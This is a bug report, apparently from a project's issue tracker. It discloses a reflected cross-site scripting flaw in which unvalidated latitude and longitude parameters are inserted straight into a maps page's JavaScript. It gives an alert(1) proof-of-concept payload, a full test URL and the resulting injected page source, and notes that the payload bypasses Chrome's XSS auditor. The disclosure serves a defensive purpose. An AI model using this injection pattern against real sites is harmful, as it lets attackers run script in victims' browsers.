latitude and longitude parameters are not validated correctly

Issue #374 new
Simon Waters created an issue

The latitude and longitude parameters are not validated and are included directly in JavaScript; this appears to permit cross-site scripting (XSS). The attack persists through login.

In the example below, latitude is coded as '17828,1);};alert(1);/*'

This terminates the open bracket for the mapping function, then closes the open function definition, runs the alert (payload), and then uses "/*" to comment out the remaining dross.

http://192.168.56.101/app/index.php/maps/default/mapAndPoint?addressString=121b+Baker%27s+Street%2C+London%2C+SW1+1TB%2C+UK&latitude=17828,1%29;};alert%281%29;/*&longitude=

I appear to be able to inject pretty much anything into the JavaScript via these parameters.

Because it injects straight into JavaScript, it isn't caught by the Chrome XSS auditor, so reflected XSS worked in Firefox and Chrome.

Resulting web page.

<div id="ModalView"><div id="AddressMapModalView"><div id='map-canvasmodal' class="mapcanvas"></div></div></div><script type="text/javascript">
/*<![CDATA[*/

            function plotMap()
            {
                var latlng = new google.maps.LatLng(17828,1);};alert(1);/*, );

Comments (0)